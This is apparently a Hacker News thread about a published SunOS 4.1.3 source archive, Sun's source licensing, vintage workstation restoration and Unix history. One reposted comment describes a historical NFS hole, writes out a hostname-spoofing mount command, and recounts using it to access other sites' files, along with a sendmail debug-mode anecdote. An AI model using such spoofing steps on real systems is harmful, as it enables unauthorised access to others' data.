which almost sounds like it was an officially distributed archive, somehow? I mean, I can't personally think of any reason for Sun to make a CD distribution of SunOS (was it called the OS/net gate yet?) for purely internal use, although maybe I'm just missing perspective, but the https://github.com/Arquivotheca/SunOS-4.1.3/blob/413/Copyrig...looks to my very-non-lawyer eyes like all-rights-reserved and 4.1.3 was well before opensolaris, so... leak of some kind?
Edit: Looking at the copyright file again, it has a part number. Did Sun license sunos? That certainly feels like it was meant for use outside of Sun, but doesn't really explain why/how
In the 1980s, it was common for vendors to offer source licenses to their customers, at times for an additional fee. DEC sold customers the OpenVMS sources (Compaq/HP continued the practice, and maybe VSI is keeping it up); IBM caused a lot of controversy in the early 1980s with the announcement that they were going to stop allowing customers source code access to MVS. Against that background, unsurprising that to learn that Sun sold source licenses to their customers for SunOS as well.
I think Microsoft was a lot more restrictive with source licenses - generally only universities for research purposes (and Windows Research Kernel was never the full OS anyway), some ISVs with specially negotiated deals, and some government agencies. The average customer couldn’t get access to the source code. Whereas, OpenVMS for example, I think basically any licensee could order the source.
NT 3.5 and 4.0 on 4 (IIRC) and 8 processors machines required to be compiled from source on the target host, the shipping kernel only supporting 2 processors and cross-compilation not being an option. Fun times :)
IIRC you had to recompile the Kernel and the HAL. I don't remember the details but compiling on anything but the very machine targeted wasn't practical.
Sun licensed SunOS and Solaris source to pretty much anyone who asked (and wanted to pay for it)
All of the proprietary unix vendors would sell source licenses to a greater or lesser extent. There's IRIX and AIX source trees out there if you go looking, licensed for university use back in the day.
Most of CE source was not particularly secret, it shipped on Platform Builder discs.
>Private Shared Source Code is an optional component of the Windows Embedded Compact 7 Platform Builder toolkit that can be installed during the setup process.
IIRC almost all Unixes followed the /src model you really only see in BSD today. Sometimes it was a separate license or only given to Universities and 3rd party developers. But before Linux it was assumed you could build the kernel and base userspace from there like you could with Bell Labs/AT&T.
The University/3rd party part was true even for Microsoft with NT and CE in the late 90s/early 00s. My little CS department got a CE dev kit with software, a device, and the source. I goofed around with it and was pretty quickly frustrated.
This also wanders into my memories of hating Sun version numbering and naming. SunOS grew SysV and became Solaris, but it was still SunOS. But it wasn’t. And then they preceded the Java-ism of the minor version being generally accepted as the major and conflictingly published materials both ways.
I feel bad for the devs where what they did made sense to them and then marketing took over. Naming and versioning are hard enough problems alone.
That is after all how UNIX spread after the UNIX 6th Edition Commentary book, and given how AT&T was forbiden to profit from their research results at Bell Labs.
Would you build your business on top of code you didn't have the source for?
We can get into the weeds with blackbox firmware and what not, but it's darn useful to be able to look at the OS code to figure things out when it's acting weird.
but it's darn useful to be able to look at the OS code to figure things out when it's acting weird.
As the other sibling comment here notes, we did that even if we didn't have the source code; we just looked at the Asm instead. People like Andrew Schulman and Matt Pietrek made themselves famous by doing that.
If you can prove that that a particular value never escapes the scope, it may be possible to allocate it on the stack instead which also reduces the amount of garbage collection needed later.
If anyone wanted to keep a museum piece Sun workstation running SunOS 4.x, but patching security vulnerabilities, maybe this is one way.
For `sun4c` kernel architectures (most SPARCs before multiprocessing), I'd try to get the source for 4.1.4. At least some of the older Sun-3 might need an older version, and I recall our Sun-386i systems were stuck at 4.0.x.
I recently fired up my old Sun 3/80 to see if it would still boot. It wouldn't. The battery backed config RAM was dead. Of course I couldn't quit, could I? I was able to find a modern replacement for the chip, order it from Mouser, get it programmed correctly (after a few tries) and hey look, it started to boot.
Then, unsurprisingly, the old Quantum SCSI disk was only happy enough to make grinding noises and no more. I found a guy making SATA to SCSI adapters meant for these old Suns and paired that to an SSD I had lying around. Hey, look, that now works too.
Finally, by setting up tftp, bootp, and NFS on a FreeBSD VM I was able to net boot the machine and install SunOS 4. My goodness, I had forgotten how slow the thing is, and how much has changed since the 1990s. I was able to get a bunch of more modern stuff to compile, but it was a fight every time.
Next I was going to drag out the old SGI Indigo, but haven't found the energy yet.
Cool. A 3/80 with SunView and period SunView tools would be great.
I'd be curious if you find a trove of the random open source SunView software from that era. A later SunSite mirror still up is at http://sunsite.informatik.rwth-aachen.de/cgi-bin/ftp.new/ftp... Starting from a Usenet archive, to find the names and original FTP sites of software might help. (Especially programs circa 1990 with names ending in "Tool". There was even a ToolTool.)
There's also commercial software. FrameMaker and Interleaf at the time were arguably nicer than 2022 Microsoft Word, for example.
I ran into the same problem with a newer Sun model (Ultra 10.) I looked up the chip on ebay and almost ordered one, but wasn't in the mood for another project I'm going to lose interest in after a week. The drive was also incredibly loud on startup, so I'm concerned it may also be dead. (The last time I booted it was probably 2005, running Solaris 8!)
That is when I had my UNIX zealot phase, starting with Xenix, DG/UX,...., but then I got to discover the parallel universe from Xerox PARC, and felt sad that UNIX has won.
Specially because many insist in using their systems as if UNIX V6 was released yesterday, NextSTEP and macOS being the exception, which isn't any surprise given how Steve Jobs looked at UNIX workstations.
The thing I do not understand is why people favour updated 1970s-style UNIX, e.g. Linux and xBSD, when more modern sophisticated later Unixes are right there for the taking, such as Plan 9 and Inferno.
My cynical suspicion is that it's because they are just too hard to understand. I know that I struggle to myself. The conceptual model of '70s UNIX, and (to me) horrible primitive tools such as Vi, are easier to understand than the richer, smarter OSes of the '80s (Plan 9, with integrated networking, proper namespaces, and the whole LAN as your workstation) and '90s (Inferno, which also abstracts away CPU architectures and replaces C with something cleaner and safer).
Same. In the mid 90's, I had a Sparc 10 at home for a while, as my main system (I bought it from a software company that went under.) What I really miss is the incredible "variety" of hardware back then. I remember working at a company where we had DEC Alphas, VAXes, Suns, HPUX systems, AIX boxes... Today everything is basically homogeneous.
What is the difference between a commercial UNIX workstation and a Mac?
Genuinely asking, I've never used a commercial UNIX workstation like you're describing.
A mac is much better in almost every way, but that is no less than you would expect given 30+ years of evolution since the 80/90s.
The bit you’re maybe missing is how different the standard dev process was back then to accommodate how slow build infra was. You (or at least I) typically started compiling something and went for a coffee or whatever because it would take a l o n g time to build anything. So often teams would have a setup where each member had a low-power desktop that was basically just an x terminal and everyone would run their actual builds on a team buildserver. If you had a proper workstation it meant you could generally build your own code directly on your workstation meaning you weren’t contending for resources on the build server with everyone else. So I remember in one team back then one guy left who had a sparc 10 on his desk, so my buddy grabbed that, I swapped from my terrible lunchbox LX to nab my friend’s sparc 5 and suddenly local builds were a possibility for me, meaning a huge increase in productivity.
My experience of mid 80s | early 90s Sun workstations was of rugged VMEbus boxes that could take the vibration of planes, trains, 4 wheel drives, heavy dust environments (with easy blow through to clean internal layouts), and the option of fully sheilded boxes, cables and monitors just in case the odd lightening strike or EMP burst happened nearby.
Nice clean OS's .. with RISC ops that failed on misalignd data which encourage clean cache aware coding styles and programs that pumped data through fast (or simply didn't work at all).
ie. Great dev boxes for cross platform coding - get it right on a Sun and it worked well pretty much across the POSIX space.
Clean! clean is the last thing I would call the commercial unixen. I have a couple sgi boxes and irix is pretty wild and weedy. I picked up a sun box and had to replace soleris with openbsd after a week. If curious the straw that broke the camels back was that the official way to change the hostname was to reinstall the os, I found an unofficial way but it was involved to say the least.
The commercial distributions tended to collect cruft without ever throwing any thing away(throwing things away may upset a paying customer that depended on the feature) linux is a cleanroom by comparison. and, as a good bsdite I consider linux an almost unusable mess.
solaris 10 run sys-unconfig reset your system back to scratch.
Compare that to openbsd... run hostname, if you want it to persist go ahead and set /etc/myname.
But the main thing was I was not raised on solaris, the system administration was foreign, the tooling sucked. the ports tree was miserable. I was probably going to run bsd anyway, but I had the hardware might as well try solaris.... and now you want me to reset the system in order to fix a minor mistake in the hostname? One insult too many.
> solaris 10 run sys-unconfig reset your system back to scratch.
Read the link for Solaris 10 I posted, there is literally a section titled:
2. Changing hostname without running sys-unconfig command
> But the main thing was I was not raised on solaris ... and now you want me to reset the system in order to fix a minor mistake in the hostname?
Read the article, renaming the host without running sys-unconfig is trivial, and only requires a reboot. It is nowhere near as hard as you are making out.
>DonHopkins 4 months ago | parent | context | favorite | on: NFS: The Early Years
NFS originally stood for "No File Security".
The NFS protocol wasn't just stateless, but also securityless!
Stewart, remember the open secret that almost everybody at Sun knew about, in which you could tftp a host's /etc/exports (because tftp was set up by default in a way that left it wide open to anyone from anywhere reading files in /etc) to learn the name of all the servers a host allowed to mount its file system, and then in a root shell simply go "hostname foo ; mount remote:/dir /mnt ; hostname `hostname`" to temporarily change the CLIENT's hostname to the name of a host that the SERVER allowed to mount the directory, then mount it (claiming to be an allowed client), then switch it back?
That's right, the server didn't bother checking the client's IP address against the host name it claimed to be in the NFS mountd request. That's right: the protocol itself let the client tell the server what its host name was, and the server implementation didn't check that against the client's ip address. Nice professional protocol design and implementation, huh?
Yes, that actually worked, because the NFS protocol laughably trusted the CLIENT to identify its host name for security purposes. That level of "trust" was built into the original NFS protocol and implementation from day one, by the geniuses at Sun who originally designed it. The network is the computer is insecure, indeed.
And most engineers at Sun knew that (and many often took advantage of it). NFS security was a running joke, thus the moniker "No File Security". But Sun proudly shipped it to customers anyway, configured with terribly insecure defaults that let anybody on the internet mount your file system. (That "feature" was undocumented, of course.)
While I was a summer intern at Sun in 1987, somebody at Sun laughingly told me about it, explaining that was how everybody at Sun read each other's email. So I tried it out by using that technique to mount remote NFS directories from Rutgers, CMU, and UMD onto my workstation at Sun. It was slow but it worked just fine.
I told my friend Ron Natalie at Rutgers, who was Associate Director of CCIS at the time, that I was able to access his private file systems over the internet from Sun, and he rightfully freaked out, because as a huge Sun customer in charge of security, nobody at Sun had ever told him about how incredibly insecure NFS actually was before, despite all Sun's promises. (Technically I was probably violating the terms of my NDA with Sun by telling him that, but tough cookies.)
For all Sun's lip service about NFS and networks and computers and security, it was widely know internally at Sun that NFS had No File Security, which was why it was such a running inside joke that Sun knowingly shipped it to their customers with such flagrantly terrible defaults, but didn't care to tell anyone who followed their advice and used their software that they were leaving their file systems wide open.
Here is an old news-makers email from Ron from Interop88 that mentions mounting NFS directories over the internet -- by then after I'd told him about NFS's complete lack of security, so he'd probably slightly secured his own servers by overriding the tftp defaults by then, and was able to mount it because he remembered one of the host names in /etc/exports and didn't need to fetch it with tftp to discover it:
>From: Ron Natalie <elbereth.rutgers.edu!ron.rutgers.edu!ron@rutgers.edu> Date: Wed, Oct 5, 1988, 4:09 AM To: NeWS-makers@brillig.umd.edu
>I love a trade show that I can walk into almost any booth and get logged in at reasonable speed to my home machine. One neat experiment was that The Wollongong Group provided a Sun 3/60C for a public mail reading terminal. It was lacking a windowing system, so I decided to see if I could start up NeWS on it. In order to do that, I NFS mounted the /usr partition from a Rutgers machine and Symlinked /usr/NeWS to the appropriate directory. This worked amazingly well.
>(The guys from the Apple booth thought that NeWS was pretty neat, I showed them how to change the menus by just editing the user.ps file.)
>DonHopkins on Sept 28, 2019 | parent | context | favorite | on: A developer goes to a DevOps conference
>I love the incredibly vague job title "Member, Technical Staff" I had at Sun. It could cover anything from kernel hacking to HVAC repair!
>At least I had root access to my own workstation (and everybody else's in the company, thanks to the fact that NFS actually stood for No File Security).
>[In the late 80's and early 90's, NFSv2 clients could change their hostname to anything they wanted before doing a mount ("hostname foobar; mount server:/foobar /mnt ; hostname original"), and that name would be sent in the mount request, and the server trusted the name the client claimed to be without checking it against the ip address, then looked it up in /etc/exports, and happily returned a file handle.
>If the NFS server or any of its clients were on your local network, you could snoop file handles by putting your ethernet card into promiscuous mode.
>And of course NFS servers often ran TFTP servers by default (for booting diskless clients), so you could usually read an NFS server's /etc/exports file to find out what client hostnames it allowed, then change your hostname to one of those before mounting any remote file system you wanted from the NFS server.
>And yes, TFTP and NFS and this security hole you could drive the space shuttle through worked just fine over the internet, not just the local area network.]
Sun's track record on network security isn't exactly "stellar" and has "burned" a lot of people (pardon the terrible puns, which can't hold a candle to IBM's "Eclipse" pun). The other gaping security hole at Sun I reported was just after the Robert T Morris Worm incident, as I explained to Martha Zimet:
>Oh yeah, there was that one time I accidentally hacked sun.com’s sendmail server, the day after the Morris worm.
>The worm was getting in via sendmail’s DEBUG command, which was usually enabled by default.
>One of the first helpful responses that somebody emailed around was a suggestion for blocking the worm by editing your sendmail binary, searching for DEBUG, and replacing the D with a NULL character.
>Which the genius running sun.com apparently did.
>That had the effect of disabling the DEBUG command, but enabling the zero-length string command!
>So as I often did, I went “telnet sun.com 25” to EXPN some news-makers email addresses that had been bouncing, and first hit return a couple of times to flush the telnet negotiation characters it sends, so the second return put it in debug mode, and the EXPN returned a whole page full of diagnostic information I wasn’t expecting!
>I reported the problem to postmaster@sun.com and they were like “sorry oops”.
True that. I gave a demo of NeWS pie menus, emacs, and the HyperTIES browser and authoring tool to Steve Jobs once, and he jumped up and down and shouted "That sucks!" Overall I got about a 3:1 sucks to neat ratio.
It's the 30 year anniversary of CHI’88 (May 15–19, 1988), where Jack Callahan, Ben Shneiderman, Mark Weiser and I (Don Hopkins) presented our paper “An Empirical Comparison of Pie vs. Linear Menus”. We found pie menus to be about 15% faster and with a significantly lower error rate than linear menus! So I've written up a 30 year retrospective:
This article will discuss the history of what’s happened with pie menus over the last 30 years (and more), present both good and bad examples, including ideas half baked, experiments performed, problems discovered, solutions attempted, alternatives explored, progress made, software freed, products shipped, as well as setbacks and impediments to their widespread adoption.
Here is the main article, and some other related articles:
Pie Menus: A 30 Year Retrospective. By Don Hopkins, Ground Up Software, May 15, 2018. Take a Look and Feel Free!
Steve Jobs Thought Pie Menus Sucked “That sucks! That sucks! Wow, that’s neat! That sucks!”
On October 25, 1988, I gave Steve Jobs a demo of pie menus, NeWS, UniPress Emacs and HyperTIES at the Educom conference in Washington DC. His reaction was to jump up and down, point at the screen, and yell “That sucks! That sucks! Wow, that’s neat! That sucks!”
I tried explaining how we’d performed an experiment proving pie menus were faster than linear menus, but he insisted the liner menus in NeXT Step were the best possible menus ever.
But who was I to rain on his parade, two weeks after the first release of NeXT Step 0.8? (Up to that time, it was the most hyped piece of vaporware ever, and doubters were wearing t-shirts saying “NeVR Step”!) Even after he went back to Apple, Steve Jobs never took a bite of Apple Pie Menus, the forbidden fruit. There’s no accounting for taste!
I'm just about old enough to remember "oldschool" Unix workstations (I used Suns at uni in the early 90s, a bit, even though I wasn't supposed to unless I was doing Applied Maths). This is when Windows 3 was new and 3.1 was on the horizon, which was a graphical frontend for DOS with some fairly janky apps - Paint was probably the highlight - and Macs were on System 6 with System 7 bringing stuff like Switcher built-in so if you had enough RAM you could actually have two programs loaded at the same time! They didn't quite multitask but they could, kind of, if they were expecting to.
Using SunOS 4 at the time on machines with masses of RAM and disk space was a bit like how vans changed with the first-gen Ford Transit - it was quick and light and you didn't have to stretch halfway across the cab to get 1st gear. You could order one with a radio, and not only that but you could actually *hear* the radio at 70mph. And - it actually did 70mph!
Comparing the SPARCStations we had back then to a modern Mac running OSX is a bit like comparing those first-gen Transits to a nice modern Merc Sprinter. It's still basically the same thing but it's a lot quicker and cleaner and the stereo has bluetooth and everything's bigger and faster and it's a hell of a lot cheaper.
In the 80s and 90s, they were significantly faster and more capable than their PC / Mac analogues. Double or triple the speeds and feeds, ten times the price ;)
By the 2000s the advantages had more or less vanished and the workstation SKUs were discontinued one by one.
PC’s were stuck with awful hardware for a long time, but the Mac story is a bit more complicated — once they became available, higher-end 68020/68030 Macs were sometimes competitive with workstations.
No. Mac II's showed up in the late 80's just as the workstation vendors were moving off 68k hardware and onto SPARC and MIPS. PA and POWER came along a few years after that, then Alpha a bit later still. Motorola never got back in the game, really, though Intel caught up with the release of the P6 in 1995.
absolutely yes! depends on your model and use case .. workstation fans often have this reaction though. Please recall that performance is not one number. Someone/something has to write code in a language, invoke hardware well and efficiently, and return the results to a user or process. Drop-down menus meant that no way could the machine do math? hardly true.. Performance on benchmarks ? probably as the others say, you will never win like a horse race. Overall in the expanding world of digital signals, media and math ? yes.. the Motorola chips had access to RAM if you could get enough of it. RAM plus math gets you a lot of places. Virtual Memory is guaranteed RAM but at what cost? all things considered, yes the Motorola CPUs did bring something and it was a highly competitive time.
edit right, add to that "digital audio signal processing" .. Virtual Memory paging was horribly obvious for Digital Audio, and that means stereo audio albums and digital audio soundtracks for movies, which was (and is) Big Business. Lots of hard math problems for geeks, lots of sales for business types.
This is only considering part of the question, which makes it a false comparison.
Classic MacOS had pretty much the best UI on any mass-market computer ever made.
And that's the part that its users saw all day every day, and interacted with, and which made Macs desirable.
Not just the front-end of programs: this extended to how to install new programs, how to add drivers or other system components, how to add fonts; how to connect to printers; how to make or break drive connections to other machines; how to connect new drives, and how to remove them. All the daily tasks of running a computer.
But UNIX people, with their gods-awful UI, didn't care about this then and they don't care about it now. UNIX UIs are better than they were but they are still very poor.
The real problem is that all the visionary innovators got old and retired and their replacements don't have the overall vision and don't really understand how stuff works, so they randomly tweak things without understanding.
So Mac OS X's UI was never as good as Classic's, and it's been getting worse and worse for 10-15Y. Read John Siracusa's excellent in-depth reviews of Mac OS X on Ars Technica for details. The generally accepted high point was Snow Leopard, 10.6, and it's been downhill since.
Microsoft never had much of the plot, but what they had hit a high point around 1996-1996 and it's been downhill since. Now, as in the last decade, Windows is a
UI train wreck.
But still people bang on about largely irrelevant behind-the-scenes stuff, not understanding that it's the whole picture that matters, not just the UI but not just the backend either.
The year after that I bought an Acorn Archimedes A310. 8MHz ARM2. It was 4x faster in raw single-threaded integer computation than the top-end 80386DX 25MHz with L1 cache that IBM sold, and that was a $10,000 PC.
It was about 10x quicker than your 16MHz machine... and it cost £800.
I see. I never considered that especially important then, and I don't now, but OK then. In that case, I submit the Acorn R140 workstation running RISC iX.
They were. The close integration of a fast RISC chip and a framebuffer meant astonishingly good graphics performance for the late 1980s. Bear in mind, this was before VESA local bus existed, before NeXTstep, anything like that.
With a 4 MIPS CPU in 1987, you didn't need a dedicated GPU for blazingly-fast graphics.
Mine predated the TIGA standard, it is a NEC card. I ported GNU binutils to it then wrote some 34010 assembler functions for X11 to call to do basic 2D graphics operations.
In a typical academic or r&d lab setting they were very hacker friendly networked setups, where people would share scripts, installed software, and media. You could access files in each other's home directories from any machine (controlled by file permissions), automate things with cron jobs, someone would be administering the IRC server, the servers and workstations would be the same OS so people would naturally graduate to running a IRC or usenet server for the local users etc.
(Probably it could also be a much less fun scenario than a Mac, with power tripping sysadmins handicapping usage, non-technical users having problems or feeling excluded, etc)
These days not much but personal computers were a lot less powerful (and less expensive) than UNIX workstations. In terms of experience though - think tricked out Linux desktop but with working sound.
> In terms of experience though - think tricked out Linux desktop but with working sound.
I've spent some time thinking about this, mostly in terms of "why do I like Solaris more than GNU/Linux, even in 2022?". I think it really does boil down to it being 1. a single coherent system, 2. including running on hardware that was designed to run it, 3. with paid support by a company that actually has skin in the game to make the thing work. (And in my case a certain amount of rose-tinted glasses.) IMO, the Bazaar can build amazing things at probably-lower cost (certainly lower per-party) and it has a diversity that is good, but the Cathedral can, in fact, Get Stuff Done and build a more coherent system. And when you're successfully selling workstations at $10k+ a pop you can afford to do high quality engineering:)
I'm sure that's a factor but maybe the particular point in the technology development curve accounts for a lot of the perceived difference. There was a striking qualitative difference between a $2000 computer and a $20000 computer and if you had access to both, the latter felt like some sort of glimpse of the future like you got a ride in a prototype flying car.
A computer that is 10x more expensive than a high-end smartphone is not Indigo² better than a 386. That gap just happened to be a brief and memorable outlier.
> So, returning to the question upthread: how a Mac is not a commercial Unix workstation? It checks all the boxes you listed.
If I were attempting to answer that, I would say that Apple de-emphasizes and neglects the unix "powertool" side of the system. But I'm not actually sold on that angle; I actually half-typed and then deleted a comment arguing that Macs are precisely unix workstations - they run a Unix™ OS on mostly custom hardware that is, at least with the latest ARM chips, more powerful than much of the market and which commands a high price (although far less so than was traditional for unix workstations:]).
EDIT: Comment downthread says they're still getting certified as an official Unix, so I've updated this comment to reflect that.
Back when Apple was convincing people to transition to OS X, their website had areas that were strongly dedicated to people for whom a UNIX workstation might have made sense. I was working in life sciences back then and the workflow was Macs running Perkin Elmer gel machines and Solaris and Irix running the analysis. Apple pushed really hard to convince us that OS X was Real UNIX.
I dont have the wayback urls now but here is a relatively recent example of their marketing to the UNIX crowd, circa 2011.
It totally is. This was an explicit selling point when they originally announced the move to OS X. They bought a Unix workstation maker and were going to make macs that were also Unix workstations.
I was looking at the login [1] code and thinking "hah, surely it must be full of stack overflows", but no, it seems they were well aware of the pitfalls there. Not so much for the heap data, but oh well.
"These are the Version 6 sources for trek. They must be modernized before
trek will compile. Everything is under SCCS ready for some willing person
to come along. Documentation is in ./doc.
Kirk McKusick 3/25/83"
I don't know for sure because I can't find any information about SunOS licensing, but I think it goes something like,
Oracle has acquired Sun Microsystems, Inc. ("Sun"), you acknowledge that in all cases where the reference is Sun, Oracle will fulfill these obligations as successor in interest to Sun.
About 20 years ago, Lenny DiCicco's resume came my way. He was interviewing for a Unix sys admin position. Having read Takedown, I recognized his name immediately. We didn't hire him. That's my Kevin Mitnick story.
It’s pretty cool to see that an entire OS can be built with a ~250 line Makefile. Yes, of course there are sub Makefiles etc, but perhaps it indicates that we could make today’s technology simpler (e.g. the Linux kernel).
If you only support a single platform and a single compiler, Makefiles are perfectly adequate. The extra baggage (autotools and such) are the extra baggage for building on any platform, with different compilers.
This brings back memories! My first job out of school was with a mostly SunOS shop. After 8-bit micros and then the very first Macintoshes, plus the various oversubscribed machines they had at school, it felt so "big league"! Good times.
Probably some trains, planes and ships from the 90's. At least I remember Cory Doctorow describing airplanes as "flying Solaris boxen with badly-secured SCADA controllers" in his "The upcoming war on general purpose computation".
I watched that presentation earlier today. Interesting how he gave the presentation in 2011 right when smartphones were taking off. I feel like what he's talking about has in part already happened (somewhat) with smartphones, tablets, and chromebooks so ubiquitous now
I know a few places. The answer is, 100% of the time, "legacy code."
One of my former employers has millions of lines of code that just assume a bigendian architecture and play fast and loose with byte order as a result. They are probably not gonna port that code off SPARC any time soon. Eventually. But not soon.
He already got a couple DMCA takedowns however (WinNT5 and SCO UnixWare-7).
It's better for those interested to mirror (locally and offline) before it's too late.
I think it was a Usenix LISA conference once where Unix wonks were handing out "Mentally Contaminated" buttons to anyone who'd seen AT&T source code and, on the basis of that experience, wouldn't be allowed to work on a "free" codebase. One of the silly but meaningful battles in the Unix wars.
That is not correct and most likely comes from scary FUDs of yesteryear between GPL and anti-GPL crowds (e.g. Microsoft who used to disallow people look at GPL'd code).
In reality looking at this (or any other leaked on unlicensed code) "taints" you pretty much the same as looking at any other code, including -e.g.- GPL/MPL/Apache2, etc code, but you don't see anyone[0] nowadays saying to not look at such code (it used to be a thing back when people were cluelessly afraid of GPL though, but that was decades ago).
The "taint" isn't inherent, it comes from the possibility that you'd rewrite code you've seen so that it is mostly identical and be sued for it (and if that is the case is something that will only be decided by a court). If anything, IIRC when GNU was making their Unix replacement utilities back in the day they recommended people to implement them in as different from Unix a way as they could, but they didn't forbid people who were "tainted" by Unix to contribute to GNU (which, if you think about it, makes perfect sense considering the people who would contribute to it were most likely already Unix programmers). This sort of remains in the current GNU Coding Standards[1]
In fact you are "tainted" the same way by read and/or participating in any codebase that isn't fully owned by yourself - but if that was an actual problem in practice, no programmer would be able to join another company unless what they did there had absolutely nothing to do with any of the companies they worked at previously as experienced programmers would actually be liabilities[2]. Meanwhile in reality programmers jump between companies all the time with their experience being seen as an asset.
[0] don't take that literally, i'm certain some people would recommend against reading GPL/MPL/etc code, but they'd be a very tiny minority - and almost certainly driven by the same old FUDs
[2] Yes, you can find anecdotes where that happened - John Carmack being sued by ZeniMax would be such a case - but those are very rare exceptions from litigious sue-happy companies and there are literally millions of professional programmers out there
> This is the SunOS 4.1.3 SUNSRC CD-ROM
which almost sounds like it was an officially distributed archive, somehow? I mean, I can't personally think of any reason for Sun to make a CD distribution of SunOS (was it called the OS/net gate yet?) for purely internal use, although maybe I'm just missing perspective, but the https://github.com/Arquivotheca/SunOS-4.1.3/blob/413/Copyrig... looks to my very-non-lawyer eyes like all-rights-reserved and 4.1.3 was well before opensolaris, so... leak of some kind?
Edit: Looking at the copyright file again, it has a part number. Did Sun license sunos? That certainly feels like it was meant for use outside of Sun, but doesn't really explain why/how